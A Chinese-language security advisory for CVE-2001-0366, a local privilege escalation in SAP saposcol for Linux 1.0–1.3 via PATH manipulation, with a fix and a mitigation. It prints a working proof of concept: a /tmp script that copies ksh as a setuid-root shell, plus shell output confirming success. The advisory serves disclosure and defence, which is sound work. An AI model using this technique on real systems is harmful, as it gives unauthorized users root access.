SAP Web Application Server 执行任意命令漏洞
发布日期:2001-05-04
更新日期:2001-05-04
受影响系统:
SAP saposcol for Linux 1.3
SAP saposcol for Linux 1.2
SAP saposcol for Linux 1.1
SAP saposcol for Linux 1.0
不受影响系统:
SAP saposcol for Linux 1.5
描述:
BUGTRAQ ID: 2662
CVE(CAN) ID:
CVE-2001-0366
本地用户可能通过修改环境变量迫使SAP执行其他程序。原报告是针对评估版的,很
可能商业版中也存在该漏洞,不过尚未确认。
<* 来源:Jochen Hein (
jochen@jochen.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ cat /tmp/expand
#!/bin/sh
cp /usr/bin/ksh /tmp/.sh
chmod 4755 /tmp/.sh
echo "done" > /tmp/blubber
$ ls -l /tmp/.sh /tmp/blubber
ls: /tmp/.sh: No such file or directory
ls: /tmp/blubber: No such file or directory
$ export PATH=/tmp:$PATH
$ /usr/sap/WAS/SYS/exe/run/saposcol
Starting collector (create new process)
$ ls -l /tmp/.sh /tmp/blubber
-rwsr-xr-x 1 root sapdb 162448 Apr 9 21:00 /tmp/.sh
-rw-r--r-- 1 root sapdb 5 Apr 9 21:00 /tmp/blubber
建议:
临时解决方案是chmod u-s /usr/sap/WAS/SYS/exe/run/saposcol
SAP 提供的升级版已经修正了该漏洞
SAP upgrade saposcol for Linux 1.5
ftp://ftp.sap.com/pub/linuxlab/saptools/saposcol
浏览次数:3875
严重程度:0(网友投票)